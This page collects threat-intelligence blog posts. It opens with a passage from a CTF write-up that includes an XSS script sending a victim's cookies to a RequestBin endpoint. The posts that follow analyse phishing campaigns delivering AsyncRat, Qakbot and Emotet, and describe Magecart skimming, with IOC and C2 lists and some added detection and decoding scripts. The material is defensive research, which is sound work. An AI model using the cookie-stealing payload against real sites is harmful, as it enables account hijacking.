As the script may run before the csrf_token input has been loaded, some delay (for example setTimeout, or an onload/onerror handler) is needed so that it executes reliably on the admin side.

After sending the script to the board and wait for a second, the flag will be shown on the board.

Solution 2

To tackle the challenge, we could set up a listener for incoming HTTP requests (e.g. a RequestBin endpoint) and post the following script to the message board:

<script>fetch("http://requestbin.net/r/<ID>/?a="+document.cookie)</script>

If the admin opens the message board, this script sends an HTTP GET request to our RequestBin endpoint with the admin’s cookies in the query string. This works here because the session cookie is not marked HttpOnly; document.cookie cannot read HttpOnly cookies.

After a short waiting, we will receive the above request with the information we need.

With the cookies of the admin account, we can now get the flag by clicking the “Get Flag” button.

Stay tuned for the second part of this blog series: Cloud challenge.

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC exploiting unusual tactics, techniques and procedures (TTPs). While most phishing we observe contain MS Word or Excel attachments, this one exploited malicious PowerPoint (.ppt) files to eventually deploy AsyncRat malware and a bitcoin stealer.

Exploitation of PowerPoint attachments is not entirely new. However, it remains uncommon, which increases the chances that unaware users will open the malicious attachment.

This phishing campaign, likely still active, appears to be focused on Asia, particularly China, although we also found samples uploaded on a popular multi-vendor AV scanner from countries in Europe.  Most of the titles of the malicious documents are generic. However, the use of titles such as “Hotel Doc” for some of their lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters, used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5: 8311c59ef727826c4b54e182a956e312], which contains malicious, obfuscated macros. The macro only executes when the user closes the file, likely to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro leverages the legitimate binary mshta.exe to connect to a hardcoded URL masked with the j.mp URL shortening service. The hardcoded URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

J.mp is an alternative domain of the better-known bit.ly shortening service. According to bit.ly’s statistics, the malicious URL we discovered was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a server used by the threat actor to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to that in a second.

Pivoting on the identified staging server revealed a significant amount of additional attack infrastructure, with a new URL for each phishing document. All of these URLs were hidden behind the same j.mp shortener and hosted on Blogspot.

By checking the URLs creation date on bitly we were able to get a timeline of the malicious campaign, which shows how the threat actor behind it has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up

Payloads

In terms of payload, we could only examine one malicious URL [Tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html] and found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, opening it with MSHTA executes, on the victim’s endpoint, a number of JavaScript payloads embedded in the page.

The first script executes a set of VBScripts that fetch the content of the following link:

hxxps://ia801408.us.archive[.]org/25/items/defender_202103/defender[.]txt

The file is deobfuscated and dropped to %Public%\bin.vbs before execution; its purpose is to disable security controls ahead of the subsequent malware stages.

Fig 4 – First script disables system’s security settings

The second script reaches out to the following URL, again with MSHTA : mylundisfarbigthenyouthink.blogspot.com/p/42.html

It contains three additional payloads that disable security defences and hide the attacker’s windows to conceal malicious activity.

Then an additional PowerShell script is executed, loaded from one of two further sites depending on the system architecture:

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/1[.]txt

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/2[.]txt

The payload will reflectively load two additional samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and an open source RAT called AsyncRat [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRat is able to send and receive commands, record keystrokes and screenshots, and upload/download files via SFTP, among other functions.

The threat actors also try to steal victims’ cryptocurrency by replacing a legitimate wallet address with one they control. This is done via the PowerShell script shown below, which looks for BTC wallet addresses in the clipboard and replaces them with the attacker’s. Our research into the attacker’s BTC address shows that it had received two small transactions, suggesting the attacker had so far had only limited success.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the stager domain attempts to terminate instances of excel.exe and winword.exe in attempt to hide attacker’s tracks.

Conclusion

The attackers’ use of open source malware and abuse of freely available Blogspot URLs as malicious infrastructure highlight the ever-lower barrier to entry for cybercriminal operations in Asia. Despite the relatively low technical sophistication of this threat, the use of malicious PowerPoint attachments shows some innovation in social engineering tactics. Overall, this campaign shows how even low-cost, multi-stage cybercriminal campaigns can pose a threat to organisations by leveraging unusual social engineering techniques and open source tools.

Indicators of Compromise

  • tumharimaakachodamarunmaine.blogspot.com
  • tumharimaakachodamarunmain.blogspot.com
  • ifyouarebadtheniamyourdadhehe.blogspot.com
  • myralundpakarloab.blogspot.com
  • mylunissharp.blogspot.com
  • mylundisfarbigthenyouthink.blogspot.com
  • 8311c59ef727826c4b54e182a956e312
  • d1a426b9afe2ca1e56cdf48523c684e3
  • 47c012de1faac9be5a860b600a06c5ee
  • f7fd745b52fb8e791254492eca2c41df9281430dcbc5b56baa715b32eeb417ed
  • ae133004d194c3701d0b2051904d07ad69c901830a710cc2de6cb465c67bdc9d
  • 015224452b3232f76924d4020b45cfc954b80a4f14563d9fe7dadffb1699f090
  • 4be0a1ade0230dc10ef523d30d3f28ab1e70a4b5587086edfcdbfa9b30fb9c9a
  • a07e7d0a6699cbcb960bbe8c3a34b85a878abda0d19cd98d2e0ce170369c7ccf
  • d925e0405f8b9a4c0c06751a36318bcccd54721c107c08dc851fec12b58ec9ab
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a
  • 4199e3e42abb7d71ca8183609e80225014ce4b232990d526ec0655b889aac5fd
  • 46730c85c3da44a3bfc2d4786db1bf1b0f13a0c523c3b7ae88749b3538d1b8c1
  • 4f0d613797aa59fbcb957162c37d586e020cfb65a886972b404bbda4473d0b5e
  • 65bbecd4400d257e8eb367b56ec846de4e4efaf3274622fd01c8751adde5d30b
  • 266ffecbcb98bd2401298ca8fbe8bdc9df9fd8ebdfee8acf267a43cedd870050
  • f9498a2b0d6c38da6ad465a0135c5d20817bffeaf5ed09b9de8a7a22ec1ada58
  • 4a90be311633d5052b7ef4c6edd0ccddd472daab1ce183af0763b69d47ce4406
  • dc36dea840aec26090afba82b6a93f706b73c850286e6d80d95bf0604cc72d43
  • 9da6a119d0986bb18a84cef88915c5934074d189b57c0ee62103b24549f1fd51

Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong targeted with malicious phishing emails aimed at delivering the Qakbot malware, also referred to as Quakbot or Qbot. While the Qakbot payload is well researched in open source, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access brokers, the cybercriminals behind Qakbot have increased their operational tempo and are actively targeting Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly given Qakbot’s links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but has since 2019 been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from likely compromised third party companies. These previous victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The email’s subject and text suggest the threat actors have hijacked email threads to add a layer of credibility to their phishing lures. In one case, a phishing email to a large company in the real estate sector referred to an existing high-profile event that the target organises each year, likely suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

In other phishing emails, like one sent to a retail organisation (see below), the threat actors spoofed the sender to make the message look like it came from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign template and requires user interaction to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50], whose macros act as a dropper. The dropper contacts one of five command and control (C2) URLs to download the same file, in this case named 55555555555.jpg, which is actually a DLL containing the second stage of the malware. Other droppers analysed behaved similarly, with different staging servers and DLL names.

We also found numerous documents similar to the one we analysed, reinforcing how this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro eventually starts the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] via rundll32.exe, a signed-binary proxy execution technique threat actors use to run malicious code under a trusted Windows binary while avoiding detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process
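As an added detection example (not from either post), the Python below classifies Windows process-creation events (Sysmon event 1 field names) for the two execution techniques described here and in the PowerPoint post above: an Office application spawning mshta.exe with a remote URL or a URL shortener, and rundll32.exe loading a module from a user-writable directory or with a non-DLL extension such as the 55555555555.jpg seen here. The events are constructed samples; the shortener and Office-parent lists are assumptions.

```python
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
URL_SHORTENERS = {"j.mp", "bit.ly", "tinyurl.com"}          # assumption: extend as needed
URL_RE = re.compile(r"""https?://([^\s/"']+)""", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(?:users|programdata|windows\\temp)\\", re.IGNORECASE)
RUNDLL32_PREFIX_RE = re.compile(r'^\s*(?:"[^"]*rundll32\.exe"|\S*rundll32\.exe)\s*', re.IGNORECASE)

# Constructed sample events with Sysmon event-1 style field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://j.mp/aBcDeF',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\victim\AppData\Local\Temp\55555555555.jpg,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\ProgramData\vendor\setup.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _basename(path):
    return PureWindowsPath(path).name.lower()


def _rundll32_module(cmdline):
    """Return the module path argument of a rundll32 command line (the part before the comma)."""
    rest = RUNDLL32_PREFIX_RE.sub("", cmdline)
    return rest.split(",", 1)[0].strip().strip('"')


def classify_event(ev):
    """Return the detection names that fire for one process-creation event."""
    hits = []
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "mshta.exe":
        url = URL_RE.search(cmd)
        if url and parent in OFFICE_PARENTS:
            hits.append("office_spawns_mshta_with_url")
        if url and url.group(1).lower() in URL_SHORTENERS:
            hits.append("mshta_url_shortener")
    elif image == "rundll32.exe":
        module = _rundll32_module(cmd)
        if module:
            if USER_WRITABLE_RE.match(module):
                hits.append("rundll32_module_from_user_writable_path")
            if PureWindowsPath(module).suffix.lower() not in (".dll", ".cpl"):
                hits.append("rundll32_module_without_dll_extension")
        if parent in OFFICE_PARENTS:
            hits.append("office_spawns_rundll32")
    return hits


def scan(events):
    """(event index, detection name) pairs over a batch of events."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify_event(ev)]


if __name__ == "__main__":
    for index, hit in scan(SAMPLE_EVENTS):
        print(index, hit)
```

The third and fourth samples are there as the benign baseline: rundll32 loading a system DLL from System32, and mshta running a local .hta under Explorer, trigger nothing, which is the false-positive check to keep when tuning these rules against a real endpoint feed.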

This specific campaign is linked to one of Qakbot’s botnets called abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often use different botnets to ensure resilience from law enforcement action and their ability to deliver malware to a wider range of targets.

Conclusion

Despite the successful law enforcement action against one of the largest spam botnets, Emotet, in January, our findings suggest that other botnets are ready to step into the vacant spot left by it.

Operations like Qakbot show how phishing will remain a significant threat for companies in Hong Kong, as threat actors use similar malware to obtain an initial foothold in companies’ networks and to deploy further malware, like human-operated ransomware.

Strong email security processes and user awareness remain paramount to avoid initial infection from similar phishing campaigns, which can lead to very impactful ransomware incidents. Threat feeds can also help detect the frequently changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion into security detection systems. In particular, we found that URLhaus' database is a useful source of Qakbot malware URLs that can aid network defenders.

C2 servers hardcoded in Qakbot DLL analysed

Note that not all of the IPs below are likely to still be in active malicious use; apply caution when using them for blocking.

67.6.54.180:443  197.49.109.229:995  149.28.101.90:8443
187.250.170.34:995  75.67.192.125:443  45.77.115.208:8443
67.141.11.98:443  187.202.130.179:443  216.215.77.18:2078
109.154.79.222:2222  67.82.244.199:2222  45.32.211.207:8443
2.88.184.160:443  41.228.211.35:443  207.246.77.75:2222
85.52.72.32:2222  197.82.221.199:443  207.246.77.75:995
86.98.21.234:443  90.53.100.20:2222  98.16.204.189:995
73.166.10.38:50003  37.210.132.106:995  80.106.85.24:2222
90.61.30.155:2222  191.84.1.58:443  86.126.220.203:443
71.182.142.63:443  73.166.10.38:61202  71.14.110.199:443
178.223.22.192:995  86.98.223.81:22  83.110.241.182:443
184.189.122.72:443  80.11.5.65:2222  76.111.128.194:443
181.39.236.199:443  187.7.236.197:995  32.212.117.188:443
72.240.200.181:2222  81.214.126.173:2222  72.36.59.46:2222
154.238.45.174:995  90.201.21.58:443  68.186.192.69:443
47.22.148.6:443  89.137.211.239:995  105.226.38.36:443
2.51.251.47:995  24.234.204.230:995  109.106.69.138:2222
199.19.117.131:443  189.222.83.156:443  108.46.145.30:443
200.76.215.87:443  181.134.233.216:443  181.129.155.10:443
37.104.39.32:995  95.77.144.238:443  37.210.255.225:995
14.137.64.132:995  100.43.250.74:995  74.195.52.3:443
70.126.76.75:443  69.47.239.10:443  73.166.10.38:443
5.194.151.240:2222  151.52.8.91:443  190.24.187.90:443
83.202.68.220:2222  197.237.62.207:443  95.77.223.148:443
189.251.67.57:995  89.136.112.74:443  47.196.49.123:443
197.161.154.132:443  190.85.91.154:443  24.229.150.54:995
120.150.218.241:995  2.50.167.241:443  189.172.242.124:443
75.136.40.155:443  193.248.154.174:2222  140.82.49.12:443
151.205.102.42:443  207.246.77.75:8443  212.197.145.59:995
41.39.134.183:443  24.139.72.117:443  47.208.8.187:443
187.213.80.185:995  149.28.99.97:2222  2.88.48.122:995
82.12.157.95:995  45.63.107.192:2222  68.15.109.125:443
77.136.21.144:995  144.202.38.185:443  2.90.219.195:443
47.40.78.73:443  207.246.77.75:443  151.60.45.241:443
173.18.126.193:2222  149.28.98.196:443  217.165.3.30:443
51.9.198.164:2222  149.28.98.196:995  190.72.211.89:2222
94.26.114.54:443  149.28.101.90:2222  84.247.55.190:8443
197.45.110.165:995  149.28.101.90:995  74.222.204.82:995
184.90.50.79:995  144.202.38.185:995  98.240.24.57:443
77.30.61.241:995  85.204.189.105:443  92.59.35.196:2083
47.134.138.15:443  96.19.117.140:443  174.20.167.39:995
196.151.252.84:443  106.250.150.98:443  45.63.107.192:443
23.236.12.55:443  98.190.24.81:443  96.61.23.88:995
81.88.254.62:443  37.116.152.122:2078  108.190.151.108:2222
105.198.236.99:443  172.87.157.235:3389  45.77.115.208:995
78.97.248.88:443  216.201.162.158:443  144.202.38.185:2222
188.25.61.41:443  95.76.27.6:443  24.185.65.68:443
45.77.115.208:443  174.87.65.179:443  149.28.98.196:2222
45.77.115.208:2222  50.244.112.106:443  24.122.0.90:443
45.32.211.207:995  189.157.252.151:443  175.141.131.195:443

Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that, in 2020, 41% of shoppers said they would purchase online items they would normally go to the store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and the cyber threats facing the industry are following suit.

As payments increasingly move online, so do cybercriminals' attempts to steal payment card data. Traditional point of sale (POS) malware steals customer data by infecting retailers' POS devices. While still present, POS malware is losing effectiveness due to increasingly secure card standards like EMV and the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for ecommerce has therefore led criminals to adopt new tactics. One of the most widespread includes stealing payment data on ecommerce websites by injecting malicious JavaScript skimmers in checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard to detect threat for online retailers. Researchers estimate that every 15 seconds one e-commerce website is infected with MageCart malicious code. Some large scale Magecart operations have compromised thousands of websites at a time, including about 2000 e-commerce sites in just three days in September. Criminals injected malicious JavaScript code likely via outdated v1 and v2 versions of the Magento e-commerce platform.

Compromise of popular third-party e-commerce platforms like Magento allows criminals to automatically deploy JavaScript skimmers on hundreds of vulnerable victims at the same time. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping Cart).

Magecart supply chain compromises are widespread. However, websites can also be targeted directly by exploiting vulnerabilities in the site itself. Malicious changes to checkout pages are often minimal and hard to detect: criminals can simply append a few lines of code to a legitimate JavaScript library, so the file keeps working as before. A US precious metals retailer discovered this year that Magecart card-stealing code had been present on its website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long-term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customers' data is a precious criminal commodity, cybercriminals also target retailers' networks for extortion. Human-operated ransomware in particular is among the most impactful and widespread threats that DarkLab analysts have observed targeting Hong Kong organisations in 2020.

This year we helped two prominent Hong Kong retailers respond to network compromises by the Maze and Netwalker ransomware families. As is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of the data-encryption coercion. For retailers that process significant amounts of customer data, a leak presents significant reputational and regulatory concerns, not to mention the operational impact that widespread encryption of systems can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims' external IT estates (including SSL VPN appliances) and exposed remote access services like RDP. However, large-scale phishing campaigns like those of Emotet can also result in ransomware deployment. A specialist news outlet recently highlighted that most malware infections, even from unknown or low-level variants, should be treated as potential ransomware incidents because of the growing popularity of initial access broker services, in which the foothold gained by commodity malware is sold on to ransomware operators.

Business email compromise remains a concern

DarkLab also observed companies in the retail sector becoming victims of another widespread threat, business email compromise. The international supply chains that Hong Kong retailers rely on make them a target for fraudsters looking to impersonate distant third parties to misappropriate funds. As working-from-home arrangements become more prevalent, fraudsters are also looking to hijack communications between two employees in the same territory, since the lack of physical interaction between colleagues makes email fraud easier.

To do that, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised email account while only modifying a few selected terms – like bank account details. This can lead to employees not realising their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene can help prevent, or at least detect, these kinds of incidents.

Opportunistic attacks are more than a nuisance

Some attacks can be less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected in a likely automated fashion by a self-spreading crypto miner. The malware exploited an exposed RDP server, but was quickly detected by the victim’s security system. Nonetheless, time and resources had to be spent to conduct a thorough systems audit to ascertain the extent of the intrusion.

Similarly, data breaches can expose large amounts of customer data and pose a significant threat despite the perceived lack of attacker sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although the technical details of the breach are unclear, similar incidents often see criminals using relatively unsophisticated techniques like SQL injection and exploitation of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The COVID-19 pandemic has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted, as health restrictions force customers to rely on e-commerce platforms for purchases of all kinds.

With the holiday season coming into full swing, the volume of online purchases will likely be at an all-time high. While there are clear opportunities for retailers to enjoy returns on a digital-focused business model, threat actors are also looking to exploit the techniques mentioned above for their own malicious purposes.

Based on DarkLab’s experience in helping retail clients respond to network intrusions and uplift their security posture, we recommend organisations to:

  • Enforce Multifactor Authentication on all remote access services, including VPN, RDP and cloud environments.
  • Ensure ongoing visibility over all external-facing assets, and conduct regular vulnerability scans of external IP addresses.
  • Ensure mail filtering is in place to block inbound email that fails SPF, DKIM or DMARC checks.
  • Conduct regular security reviews of third-party code running on sensitive web pages such as checkout pages, and pin it with Subresource Integrity where the provider supports it.
  • Enforce a Content Security Policy that restricts which domains can serve scripts to your site and which hosts your pages may send data to, and review it regularly. Together with CSP violation reporting, this limits a Magecart skimmer's ability to load and to exfiltrate customers' data from your site.
  • Consider adopting compliance as code to ensure breaches of pre-established security measures are automatically detected and stopped.
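The third-party code review and Content Security Policy recommended above, and the "few appended lines" Magecart pattern described earlier, can be turned into a repeatable check. The script below is an added example for this page, not code from the original post or from any vendor: the checkout page HTML, the baseline file and the allowlisted hosts are constructed (reserved .example names), and in a real review the served scripts would be fetched at audit time rather than passed in.

```python
"""Review the scripts on a checkout page against a known-good baseline and
emit a matching Content-Security-Policy. Added example, not code from the
original post; the page, the files and the hosts are constructed."""
import hashlib
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed: first-party script as deployed, and the hosts allowed to serve scripts.
KNOWN_GOOD_FILES = {
    "/static/checkout.js": "function submitOrder(f){return fetch('/api/order',{method:'POST',body:new FormData(f)});}\n",
}
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.payment-provider.example"}


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


BASELINE = {path: sha256(body) for path, body in KNOWN_GOOD_FILES.items()}

# Constructed: the same file with one line appended, the typical Magecart
# modification (here a harmless comment stands in for the skimmer).
TAMPERED_FILE = KNOWN_GOOD_FILES["/static/checkout.js"] + "/* appended by an attacker */\n"

# Constructed checkout page as served to customers.
PAGE_HTML = """<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/sdk.js"></script>
<script src="https://cdn.stat1stics.example/track.js"></script>
<script>window.__t = Date.now();</script>
</head><body><form id="pay"></form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script URLs and count inline script blocks."""

    def __init__(self):
        super().__init__()
        self.external: List[str] = []
        self.inline = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline += 1

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def review_page(html: str, served: Dict[str, str]) -> List[str]:
    """`served` maps first-party script paths to the content customers actually receive."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        u = urlparse(src)
        if u.hostname not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"script from non-allowlisted host: {u.hostname}")
        elif u.path in BASELINE:
            body = served.get(u.path)
            if body is None:
                findings.append(f"{u.path} could not be compared with the baseline")
            elif sha256(body) != BASELINE[u.path]:
                findings.append(f"first-party script modified since baseline: {u.path}")
    if collector.inline:
        findings.append(f"{collector.inline} inline script block(s) present on the checkout page")
    return findings


def build_csp() -> str:
    """Only allowlisted hosts may run script; only the shop and the payment
    provider may receive data; violations are reported, which is also how a
    blocked skimmer becomes visible."""
    hosts = " ".join(sorted(ALLOWED_SCRIPT_HOSTS))
    return (f"default-src 'self'; script-src {hosts}; "
            "connect-src 'self' https://js.payment-provider.example; "
            "img-src 'self'; form-action 'self'; object-src 'none'; "
            "base-uri 'self'; report-uri /csp-report")


if __name__ == "__main__":
    for line in review_page(PAGE_HTML, {"/static/checkout.js": TAMPERED_FILE}):
        print("-", line)
    print("Content-Security-Policy:", build_csp())
```

Against the tampered deployment the review reports the modified first-party file, the unknown statistics host and the inline script; against the known-good files only the latter two remain. The payment provider's SDK is allowlisted by host but not hash-pinned here, which is where Subresource Integrity belongs when the provider publishes stable versions.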

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims' banking credentials, it eventually evolved into a vehicle for spreading third-party malware via large spam campaigns. Emotet developers have been collaborating for months with those of Trickbot and Qakbot to deliver ransomware, which means an Emotet infection is likely to lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large amounts of spam to Japan and New Zealand, among other target countries.

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region previously unreported to be affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport, and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received their malicious emails.

Among the targets identified, particularly worrying is the presence of Hong Kong’s main airport. The organisation was very likely not compromised, or they would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would have likely had serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s epoch2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails contain MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click an enable content button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated malicious macros then load a base64-encoded PowerShell script into memory, which downloads an executable from one of seven hardcoded URLs. Multiple dropper sites ensure successful malware delivery even if one or more of them are taken down.

Figure 3 – decoded and partially deobfuscated powershell script reveals the dropper URLs (highlighted)
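The decoding step shown in Figure 3 is routine enough to script. The block below is an added example for this page, not code from the original post: the encoded command is built from a constructed, harmless stand-in script that keeps the shape Emotet's macros used (an array of URLs tried in turn, a download to %TEMP%, then execution), and the domains are reserved .example names.

```python
"""Decode a `powershell -EncodedCommand` payload and pull out the dropper
URLs. Added example, not code from the original post; the encoded command
is constructed here from a harmless stand-in script."""
import base64
import re
from typing import List

# Constructed stand-in for the script the macro would hand to powershell.exe.
FAKE_SCRIPT = (
    "$u='http://one.example/wp-includes/AbC1/@http://two.example/cgi-bin/XyZ/"
    "@http://three.example/wp-content/Q9/'.Split('@');"
    "$p=$env:TEMP+'\\'+'977.exe';"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,$p);"
    "Invoke-Item $p;break}catch{}}"
)


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand takes base64 over UTF-16LE text, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell.exe -w hidden -enc " + encode_for_powershell(FAKE_SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"@;)]+", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> str:
    """Recover the cleartext script from a process command line."""
    m = ENC_RE.search(command_line)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_urls(script: str) -> List[str]:
    return URL_RE.findall(script)


def defang(url: str) -> str:
    """hxxp:// and [.] in the host so the indicator is safe to paste into a report."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def triage(command_line: str) -> List[str]:
    """Decoded script -> list of defanged dropper URLs, ready for the IOC table."""
    return [defang(u) for u in extract_urls(decode_encoded_command(command_line))]


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    for u in triage(SAMPLE_CMDLINE):
        print(u)
```

Real samples usually wrap this in a further layer (string concatenation, character-code arrays, or a compressed stream fed to IO.Compression.DeflateStream); the UTF-16LE decode is the first layer, and the URL regex is applied to whatever the final layer yields.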

This first-stage payload, whose name varies between the samples analysed, is by default saved under %TEMP%, %APPDATA% or the user's profile folder. When run, it gains persistence by copying itself into the system root folder under a different name and by modifying registry entries so that the process runs every time the endpoint boots. The new executable in the system root is the actual Emotet payload, named kbdrost.exe in our sample, and it reaches out to a command and control server via an HTTP POST request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

According to previously observed behaviour, Emotet will eventually drop the Trickbot or Qakbot trojans, which will then deliver the Ryuk or Prolock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to continue to pose a threat to companies in Asia Pacific in the foreseeable future. DarkLab’s discovery of Emotet’s targeting of Hong Kong organisations shows how companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, including the hardcoded C2 IP addresses. However, Emotet's attack infrastructure changes rapidly; we suggest readers refer to Cryptolaemus' daily IOC lists for an updated and comprehensive overview of Emotet's infrastructure.

Filename            SHA-256 hash
MJ-1759 report.doc  5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
kbdrost.exe         9f9ac55291000f55721ff0fcf8fd421d94eb0e2f0259c161a8d17b2cb0894fa0
Executable dropper URLs
hxxp://haymetetrading[.]com/wp-includes/yGELKj4/
